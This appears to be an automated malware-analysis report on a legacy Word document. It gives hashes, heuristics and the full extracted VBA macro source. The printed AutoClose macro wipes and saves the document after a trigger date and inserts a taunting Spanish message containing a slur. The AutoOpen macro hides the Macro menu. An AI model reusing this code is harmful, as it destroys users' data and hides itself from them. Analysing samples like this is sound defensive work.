Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc6450f95168a163…

MALICIOUS

Office (OLE)

37.0 KB Created: 2000-12-07 17:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 14dd141ccef415c3a1127bc8dc2776aa SHA-1: 402754d11045c7b518ef72fb936c4c0979d53337 SHA-256: fc6450f95168a163e1d5a27053d236207b7ef2f622a63cf7331049a7582968ec
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, specifically an AutoClose and AutoOpen subroutine. The AutoClose macro is designed to execute if the current day is after the 15th and the month is after October. If triggered, it deletes the document content, saves the document, displays a large red message "SATÁN TE INVADE...!!!", and then attempts to close the application. The AutoOpen macro attempts to hide the 'Macro' option from the 'Tools' menu. No external network activity or payload execution was detected.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1794 bytes
SHA-256: 145d2cb1e9bb77a828dea6d7f8b0f1eaac1a490223ffb235eb904eed6d7450a6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"
Public Sub AutoClose()
Attribute AutoClose.VB_Description = "Cierra el documento activo de Microsoft Word"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoClose"
'
' AutoClose Macro
' Cierra el documento activo de Microsoft Word
'

If WordBasic.Day(WordBasic.Now()) > 15 And WordBasic.Month(WordBasic.Now()) > 10 Then

    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.ColorIndex = wdRed
    Selection.Font.Size = 26
    Selection.Font.Bold = wdToggle
    Selection.Font.Name = "Comic Sans MS"
    Selection.TypeText Text:="SATÁN TE INVADE...!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.Font.ColorIndex = wdAuto
    Selection.Font.Bold = wdToggle
    Selection.Font.Bold = wdToggle
    Selection.Font.Name = "Arial"
    Selection.Font.Size = 22
    Selection.TypeText Text:= _
        "Por maricón y maruja, por hablar mal de tus hermanos sin ver"
    Selection.TypeText Text:=" tus defectos."
    ActiveDocument.Save
    Application.Quit
End If
End Sub

Attribute VB_Name = "AutoOpen"
Public Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Abre un documento de Microsoft Word"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoOpen"
'
' AutoOpen Macro
' Abre un documento de Microsoft Word
'
CommandBars("Tools").Controls("Macro").Visible = False

End Sub